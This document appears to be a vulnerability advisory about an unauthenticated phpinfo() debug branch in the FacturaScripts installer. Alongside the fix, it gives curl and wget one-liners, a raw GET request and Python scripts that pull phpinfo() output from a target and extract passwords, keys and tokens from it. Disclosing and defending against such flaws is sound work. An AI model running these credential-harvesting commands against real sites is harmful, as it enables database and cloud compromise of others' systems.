FacturaScripts Installer, Unauthenticated phpinfo() Exposure, High

How the CVE works:

The Installer controller in FacturaScripts contains a hidden debug branch that calls phpinfo() whenever a request to the installer carries the query parameter phpinfo=TRUE. The branch was added in commit 8c31c106 on February 27, 2018, and is still present in v2026-39-g262e79208 (April 2026). The code lives in `Core/Controller/Installer.php` around line 115: if `$this->request->query('phpinfo', '')` is strictly equal to the string `'TRUE'` (the comparison is case-sensitive, so `phpinfo=true` does not trigger it), the controller calls `phpinfo()` and returns immediately. No authentication, session or installation state is checked first; an attacker only needs to know the parameter name and value.

The installer is reachable while configuration is incomplete (`config.php` does not yet define `db_name`), so the endpoint is exposed on every fresh, not-yet-configured deployment. A GET to `/?phpinfo=TRUE` returns the full `phpinfo()` page: PHP version and build details, loaded extensions and their settings, the `$_SERVER`/`$_ENV` tables with whatever the host or container passes into the PHP process (in practice this can include values such as DB_PASSWORD, APP_KEY or AWS_SECRET_ACCESS_KEY), filesystem paths, and the request's own HTTP headers. This is a classic CWE-200 information disclosure, similar to CVE-2025-34081.

The attack needs no credentials, cookies or prior interaction and works against any reachable FacturaScripts instance whose installation has not been finalized. On shared hosting or cloud platforms, fresh deployments often stay unconfigured for extended periods, which gives a reliable exploitation window; the branch has shipped for over eight years across multiple major versions. A single `curl "http://target/?phpinfo=TRUE"` retrieves the full dump, and any credentials it reveals lead to further compromise wherever they are reused.
<h2 style="color: blue;">dailycve form:</h2>
Platform: FacturaScripts webapp
Version: 2018–2026 (v2026-39)
Vulnerability: Unauthenticated phpinfo() disclosure
Severity: High
Date: April 13 2026
<h2 style="color: blue;">Prediction: April 20 2026</h2>
<h2 style="color: blue;">What Undercode Says:</h2>
<h2 style="color: blue;">Analytics – bash commands to detect and test:</h2>

Check if vulnerable (phpinfo() output always carries the literal text "PHP Version"):
curl -s "http://localhost:8000/?phpinfo=TRUE" | grep -qi "PHP Version" && echo "VULNERABLE"
Extract environment variables (phpinfo() lists them as $_SERVER['NAME'] and $_ENV['NAME'] table cells; $_ENV rows only appear when variables_order includes E, so match both):
curl -s "http://localhost:8000/?phpinfo=TRUE" | grep -oE '\$_(ENV|SERVER)\[[^]]+\]'
Simulate attack from remote:
wget -q -O - "http://target.tld/?phpinfo=TRUE" | grep "DB_PASSWORD"

<h2 style="color: blue;">Code snippet to reproduce:</h2>

import re
import requests
r = requests.get('http://target/?phpinfo=TRUE', timeout=10)
if 'PHP Version' in r.text:  # phpinfo() output came back: the installer debug branch is live
    # phpinfo() renders each $_SERVER/$_ENV row as ...['NAME']</td><td class="v">VALUE</td>
    for name, value in re.findall(r"\['([^']+)'\]</td><td class=\"v\">([^<]*)", r.text):
        if re.search(r'PASS|SECRET|KEY|TOKEN', name):
            print('Credential found:', name, '=', value)

<h2 style="color: blue;">Exploit:</h2>
Send unauthenticated GET request to any reachable FacturaScripts instance where `config.php` does not yet contain database credentials:

GET /?phpinfo=TRUE HTTP/1.1
Host: vulnerable-site.com

No headers or body needed. The response contains full `phpinfo()` output. Use grep to extract secrets:

curl -s "http://vulnerable-site.com/?phpinfo=TRUE" | grep -E '_(PASSWORD|KEY|SECRET)'
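
The grep one-liners above and the reproduce snippet pull raw HTML rows out of the dump. The following Python is an added example, not code from this page or from the FacturaScripts project: it parses the `$_SERVER`/`$_ENV` tables that phpinfo() renders, decodes the HTML-escaped values, and returns only the credential-looking entries, so a response can be triaged offline. The sample response is constructed here (the values are placeholders), the regular expressions assume PHP's standard phpinfo() HTML layout (`<td class="e">$_SERVER['NAME']</td><td class="v">VALUE</td>`), and the function names are my own.

```python
import html
import re

# Constructed sample of the rows phpinfo() emits in its "PHP Variables" table.
# Not captured from a real FacturaScripts host; a real dump is thousands of lines.
SAMPLE_PHPINFO = """
<h1 class="p">PHP Version 8.1.34</h1>
<tr><td class="e">$_SERVER['DB_PASSWORD']</td><td class="v">s3cr&amp;t!</td></tr>
<tr><td class="e">$_SERVER['DB_USER']</td><td class="v">facturascripts</td></tr>
<tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">erp.example.test</td></tr>
<tr><td class="e">$_ENV['AWS_SECRET_ACCESS_KEY']</td><td class="v">wJalr...EXAMPLEKEY</td></tr>
<tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v">/var/www/facturascripts</td></tr>
<tr><td class="e">$_SERVER['APP_KEY']</td><td class="v"><i>no value</i></td></tr>
"""

# phpinfo() puts the variable name and its HTML-escaped value in adjacent
# <td class="e"> / <td class="v"> cells. $_ENV['...'] rows exist only when
# variables_order includes E; $_SERVER['...'] rows are always present.
ROW_RE = re.compile(
    r"<td class=\"e\">\$_(SERVER|ENV)\['([^']+)'\]</td>\s*<td class=\"v\">(.*?)</td>", re.S)
SECRET_RE = re.compile(r"(PASS|PWD|SECRET|TOKEN|KEY|DSN)", re.I)
VERSION_RE = re.compile(r"PHP Version ([0-9][0-9.]*)")


def is_phpinfo_page(body: str) -> bool:
    """True if a response body looks like phpinfo() output rather than the installer page."""
    return 'PHP Version' in body and 'class="e"' in body


def php_version(body: str):
    """The PHP version string phpinfo() prints in its banner, or None."""
    m = VERSION_RE.search(body)
    return m.group(1) if m else None


def extract_variables(body: str) -> dict:
    """Return {NAME: value} for every $_SERVER/$_ENV row, entities decoded.
    phpinfo() prints '<i>no value</i>' for empty strings; that becomes ''."""
    out = {}
    for _scope, name, raw in ROW_RE.findall(body):
        value = '' if raw == '<i>no value</i>' else html.unescape(re.sub(r'<[^>]+>', '', raw))
        out[name] = value
    return out


def find_secrets(body: str) -> dict:
    """Subset of extract_variables() whose names look credential-like and are non-empty."""
    return {k: v for k, v in extract_variables(body).items() if SECRET_RE.search(k) and v}


if __name__ == '__main__':
    # In the field, pass requests.get('http://target/?phpinfo=TRUE').text instead of the sample.
    print('phpinfo page:', is_phpinfo_page(SAMPLE_PHPINFO), '| PHP', php_version(SAMPLE_PHPINFO))
    for name, value in find_secrets(SAMPLE_PHPINFO).items():
        print(f'  {name} = {value}')
```

Feeding the live response body to `find_secrets()` gives the same triage the `grep -E '_(PASSWORD|KEY|SECRET)'` pipeline approximates, but with decoded values and without the surrounding HTML; `is_phpinfo_page()` separates a genuine hit from an installer that simply echoed a normal page back.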

<h2 style="color: blue;">Protection from this CVE:</h2>
<h2 style="color: blue;">Remove lines 115–118 in Core/Controller/Installer.php:</h2>

// Delete these lines:
if ('TRUE' === $this->request->query('phpinfo', '')) {
    phpinfo();
    return;
}

Alternatively, restrict access to the installer to localhost or trusted addresses, or put authentication in front of it until setup is complete. Apply the commit that removes the debug branch, or upgrade to a patched release once one is published. As a temporary mitigation, have the web application firewall or reverse proxy reject any request whose query string contains a `phpinfo` parameter (match the parameter name regardless of value or case, not only the exact `phpinfo=TRUE` string), and finish the installation promptly so `config.php` gains its `db_name` and the installer is no longer reachable.
<h2 style="color: blue;">Impact:</h2>
- Exposure of database credentials (DB_PASSWORD, DB_USER), where the hosting environment passes them to PHP as environment variables, leading to direct database compromise.
- Leak of application secrets (APP_KEY, JWT_SECRET) enabling token forgery.
- Cloud provider keys (AWS_SECRET_ACCESS_KEY) allowing lateral movement into cloud infrastructure.
- Full filesystem paths facilitating path traversal and local file inclusion attacks.
- Exact PHP version and extension list (e.g., PHP 8.1.34) enabling version-specific CVE exploitation.
- HTTP headers revealing internal reverse proxies, load balancers, or authentication mechanisms.
- Database connection details (socket paths, PDO drivers) aiding further SQL injection or denial-of-service attacks.

Sources:

Reported By: github.com